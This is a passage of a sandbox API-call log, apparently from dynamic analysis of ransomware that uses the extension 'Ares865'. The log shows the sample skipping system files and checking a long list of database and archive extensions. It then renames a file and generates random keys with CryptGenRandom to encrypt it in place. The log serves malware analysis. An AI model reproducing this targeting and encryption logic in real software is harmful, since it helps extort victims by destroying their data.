nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.064] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.064] lstrlenW (lpString="desktop.ini") returned 11 [0060.064] lstrlenW (lpString="C:\\Users\\Default User\\Pictures\\*") returned 32 [0060.064] lstrcpyW (in: lpString1=0x2cce43e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.064] lstrlenW (lpString="desktop.ini") returned 11 [0060.065] lstrlenW (lpString="Ares865") returned 7 [0060.065] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.065] lstrlenW (lpString=".dll") returned 4 [0060.065] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.065] lstrlenW (lpString=".lnk") returned 4 [0060.065] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.065] lstrlenW (lpString=".ini") returned 4 [0060.065] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.065] lstrlenW (lpString=".sys") returned 4 [0060.065] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.065] lstrlenW (lpString="desktop.ini") returned 11 [0060.065] lstrlenW (lpString="bak") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.065] lstrlenW (lpString="ba_") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.065] lstrlenW (lpString="dbb") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.065] lstrlenW (lpString="vmdk") returned 4 [0060.065] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.065] lstrlenW (lpString="rar") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.065] lstrlenW (lpString="zip") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.065] lstrlenW (lpString="tgz") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.065] lstrlenW (lpString="vbox") returned 4 [0060.065] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.065] lstrlenW (lpString="vdi") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.065] lstrlenW (lpString="vhd") returned 3 [0060.065] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.065] lstrlenW (lpString="vhdx") returned 4 [0060.065] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.065] lstrlenW (lpString="avhd") returned 4 [0060.065] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.065] lstrlenW (lpString="db") returned 2 [0060.065] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.065] lstrlenW (lpString="db2") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.066] lstrlenW (lpString="db3") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.066] lstrlenW (lpString="dbf") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.066] lstrlenW (lpString="mdf") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.066] lstrlenW (lpString="mdb") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.066] lstrlenW (lpString="sql") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.066] lstrlenW (lpString="sqlite") returned 6 [0060.066] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.066] lstrlenW (lpString="sqlite3") returned 7 [0060.066] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.066] lstrlenW (lpString="sqlitedb") returned 8 [0060.066] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.066] lstrlenW (lpString="xml") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.066] lstrlenW (lpString="$er") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.066] lstrlenW (lpString="4dd") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.066] lstrlenW (lpString="4dl") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.066] lstrlenW (lpString="^^^") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.066] lstrlenW (lpString="abs") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.066] lstrlenW (lpString="abx") returned 3 [0060.066] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.066] lstrlenW (lpString="accdb") returned 5 [0060.066] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.066] lstrlenW (lpString="accdc") returned 5 [0060.066] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.066] lstrlenW (lpString="accde") returned 5 [0060.067] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.067] lstrlenW (lpString="accdr") returned 5 [0060.067] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.067] lstrlenW (lpString="accdt") returned 5 [0060.067] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.067] lstrlenW (lpString="accdw") returned 5 [0060.067] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.067] lstrlenW (lpString="accft") returned 5 [0060.067] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.067] lstrlenW (lpString="adb") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.067] lstrlenW (lpString="adb") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.067] lstrlenW (lpString="ade") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.067] lstrlenW (lpString="adf") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.067] lstrlenW (lpString="adn") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.067] lstrlenW (lpString="adp") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.067] lstrlenW (lpString="alf") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.067] lstrlenW (lpString="ask") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.067] lstrlenW (lpString="btr") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.067] lstrlenW (lpString="cat") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.067] lstrlenW (lpString="cdb") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.067] lstrlenW (lpString="ckp") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.067] lstrlenW (lpString="cma") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.067] lstrlenW (lpString="cpd") returned 3 [0060.067] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.067] lstrlenW (lpString="dacpac") returned 6 [0060.068] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.068] lstrlenW (lpString="dad") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.068] lstrlenW (lpString="dadiagrams") returned 10 [0060.068] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.068] lstrlenW (lpString="daschema") returned 8 [0060.068] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.068] lstrlenW (lpString="db-journal") returned 10 [0060.068] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.068] lstrlenW (lpString="db-shm") returned 6 [0060.068] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.068] lstrlenW (lpString="db-wal") returned 6 [0060.068] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.068] lstrlenW (lpString="dbc") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.068] lstrlenW (lpString="dbs") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.068] lstrlenW (lpString="dbt") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.068] lstrlenW (lpString="dbv") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.068] lstrlenW (lpString="dbx") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.068] lstrlenW (lpString="dcb") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.068] lstrlenW (lpString="dct") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.068] lstrlenW (lpString="dcx") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.068] lstrlenW (lpString="ddl") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.068] lstrlenW (lpString="dlis") returned 4 [0060.068] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.068] lstrlenW (lpString="dp1") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.068] lstrlenW (lpString="dqy") returned 3 [0060.068] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.068] lstrlenW (lpString="dsk") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.069] lstrlenW (lpString="dsn") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.069] lstrlenW (lpString="dtsx") returned 4 [0060.069] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.069] lstrlenW (lpString="dxl") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.069] lstrlenW (lpString="eco") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.069] lstrlenW (lpString="ecx") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.069] lstrlenW (lpString="edb") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.069] lstrlenW (lpString="epim") returned 4 [0060.069] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.069] lstrlenW (lpString="fcd") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.069] lstrlenW (lpString="fdb") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.069] lstrlenW (lpString="fic") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.069] lstrlenW (lpString="flexolibrary") returned 12 [0060.069] lstrlenW (lpString="fm5") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.069] lstrlenW (lpString="fmp") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.069] lstrlenW (lpString="fmp12") returned 5 [0060.069] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.069] lstrlenW (lpString="fmpsl") returned 5 [0060.069] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.069] lstrlenW (lpString="fol") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.069] lstrlenW (lpString="fp3") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.069] lstrlenW (lpString="fp4") returned 3 [0060.069] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.069] lstrlenW (lpString="fp5") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.070] lstrlenW (lpString="fp7") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.070] lstrlenW (lpString="fpt") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.070] lstrlenW (lpString="frm") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.070] lstrlenW (lpString="gdb") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.070] lstrlenW (lpString="gdb") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.070] lstrlenW (lpString="grdb") returned 4 [0060.070] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.070] lstrlenW (lpString="gwi") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.070] lstrlenW (lpString="hdb") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.070] lstrlenW (lpString="his") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.070] lstrlenW (lpString="ib") returned 2 [0060.070] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.070] lstrlenW (lpString="idb") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.070] lstrlenW (lpString="ihx") returned 3 [0060.070] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.070] lstrlenW (lpString="itdb") returned 4 [0060.071] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.071] lstrlenW (lpString="itw") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.071] lstrlenW (lpString="jet") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.071] lstrlenW (lpString="jtx") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.071] lstrlenW (lpString="kdb") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.071] lstrlenW (lpString="kexi") returned 4 [0060.071] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.071] lstrlenW (lpString="kexic") returned 5 [0060.071] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.071] lstrlenW (lpString="kexis") returned 5 [0060.071] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.071] lstrlenW (lpString="lgc") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.071] lstrlenW (lpString="lwx") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.071] lstrlenW (lpString="maf") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.071] lstrlenW (lpString="maq") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.071] lstrlenW (lpString="mar") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.071] lstrlenW (lpString="marshal") returned 7 [0060.071] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.071] lstrlenW (lpString="mas") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.071] lstrlenW (lpString="mav") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.071] lstrlenW (lpString="maw") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.071] lstrlenW (lpString="mdbhtml") returned 7 [0060.071] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.071] lstrlenW (lpString="mdn") returned 3 [0060.071] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.072] lstrlenW (lpString="mdt") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.072] lstrlenW (lpString="mfd") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.072] lstrlenW (lpString="mpd") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.072] lstrlenW (lpString="mrg") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.072] lstrlenW (lpString="mud") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.072] lstrlenW (lpString="mwb") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.072] lstrlenW (lpString="myd") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.072] lstrlenW (lpString="ndf") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.072] lstrlenW (lpString="nnt") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.072] lstrlenW (lpString="nrmlib") returned 6 [0060.072] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.072] lstrlenW (lpString="ns2") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.072] lstrlenW (lpString="ns3") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.072] lstrlenW (lpString="ns4") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.072] lstrlenW (lpString="nsf") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.072] lstrlenW (lpString="nv") returned 2 [0060.072] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.072] lstrlenW (lpString="nv2") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.072] lstrlenW (lpString="nwdb") returned 4 [0060.072] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.072] lstrlenW (lpString="nyf") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.072] lstrlenW (lpString="odb") returned 3 [0060.072] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.073] lstrlenW (lpString="odb") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.073] lstrlenW (lpString="oqy") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.073] lstrlenW (lpString="ora") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.073] lstrlenW (lpString="orx") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.073] lstrlenW (lpString="owc") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.073] lstrlenW (lpString="p96") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.073] lstrlenW (lpString="p97") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.073] lstrlenW (lpString="pan") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.073] lstrlenW (lpString="pdb") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.073] lstrlenW (lpString="pdm") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.073] lstrlenW (lpString="pnz") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.073] lstrlenW (lpString="qry") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.073] lstrlenW (lpString="qvd") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.073] lstrlenW (lpString="rbf") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.073] lstrlenW (lpString="rctd") returned 4 [0060.073] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.073] lstrlenW (lpString="rod") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.073] lstrlenW (lpString="rodx") returned 4 [0060.073] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.073] lstrlenW (lpString="rpd") returned 3 [0060.073] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.073] lstrlenW (lpString="rsd") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.074] lstrlenW (lpString="sas7bdat") returned 8 [0060.074] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.074] lstrlenW (lpString="sbf") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.074] lstrlenW (lpString="scx") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.074] lstrlenW (lpString="sdb") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.074] lstrlenW (lpString="sdc") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.074] lstrlenW (lpString="sdf") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.074] lstrlenW (lpString="sis") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.074] lstrlenW (lpString="spq") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.074] lstrlenW (lpString="te") returned 2 [0060.074] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.074] lstrlenW (lpString="teacher") returned 7 [0060.074] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.074] lstrlenW (lpString="tmd") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.074] lstrlenW (lpString="tps") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.074] lstrlenW (lpString="trc") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.074] lstrlenW (lpString="trc") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.074] lstrlenW (lpString="trm") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.074] lstrlenW (lpString="udb") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.074] lstrlenW (lpString="udl") returned 3 [0060.074] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.074] lstrlenW (lpString="usr") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.075] lstrlenW (lpString="v12") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.075] lstrlenW (lpString="vis") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.075] lstrlenW (lpString="vpd") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.075] lstrlenW (lpString="vvv") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.075] lstrlenW (lpString="wdb") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.075] lstrlenW (lpString="wmdb") returned 4 [0060.075] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.075] lstrlenW (lpString="wrk") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.075] lstrlenW (lpString="xdb") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.075] lstrlenW (lpString="xld") returned 3 [0060.075] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.075] lstrlenW (lpString="xmlff") returned 5 [0060.075] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Pictures\\desktop.ini.Ares865") returned 50 [0060.075] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Pictures\\desktop.ini" (normalized: "c:\\users\\default user\\pictures\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\pictures\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.076] CreateFileW (lpFileName="C:\\Users\\Default User\\Pictures\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\pictures\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.076] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=504) returned 1 [0060.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0060.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.077] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.077] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.077] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500, lpName=0x0) returned 0x164 [0060.080] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x500) returned 0x190000 [0060.081] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.082] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.082] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.082] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.082] CloseHandle (hObject=0x164) returned 1 [0060.083] CloseHandle (hObject=0x15c) returned 1 [0060.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0060.084] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.084] HeapFree (in: 